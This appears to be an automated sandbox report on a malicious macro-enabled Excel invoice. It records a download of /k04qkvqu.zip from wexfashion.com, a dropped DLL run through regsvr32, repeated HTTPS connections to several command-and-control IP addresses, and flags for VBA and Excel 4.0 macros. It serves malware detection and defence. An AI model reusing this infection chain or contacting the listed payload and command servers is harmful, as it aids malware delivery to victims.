Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88DFF5C3.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /k04qkvqu.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wexfashion.comConnection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com6 equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: wexfashion.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0T#
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK&
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabco
Source: DWWIN.EXE, 00000006.00000002.2225516913.0000000000122000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enuy#
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226486787.0000000002A31000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226486787.0000000002A31000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2374448037.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2374547806.00000000008C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226127205.0000000002410000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmpString found in binary or memory: http://www.pub.
Source: DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/2
Source: regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/5
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/xw1
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/H
Source: regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/rt
Source: regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49345
Source: unknownNetwork traffic detected: HTTP traffic on port 49397 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49341
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49365 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 49385 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49357 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49397
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49393
Source: unknownNetwork traffic detected: HTTP traffic on port 49377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49341 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49389
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49385
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49393 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49381
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49361 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49377
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49373
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49381 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49369
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49365
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49361
Source: unknownNetwork traffic detected: HTTP traffic on port 49353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49357
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49353
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 49373 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49349
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49361 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49365 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49369 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49373 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49377 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49381 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49385 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49393 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49397 version: TLS 1.2
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: INV8073565781-20210111319595.xlsmInitial sample: CALL
Source: INV8073565781-20210111319595.xlsmInitial sample: CALL
Source: INV8073565781-20210111319595.xlsmInitial sample: CALL
Source: INV8073565781-20210111319595.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\cjrumqtd.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001CB780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001CBA14 NtSetInformationProcess,
Source: INV8073565781-20210111319595.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV8073565781-20210111319595.xlsmOLE indicator, VBA macros: true
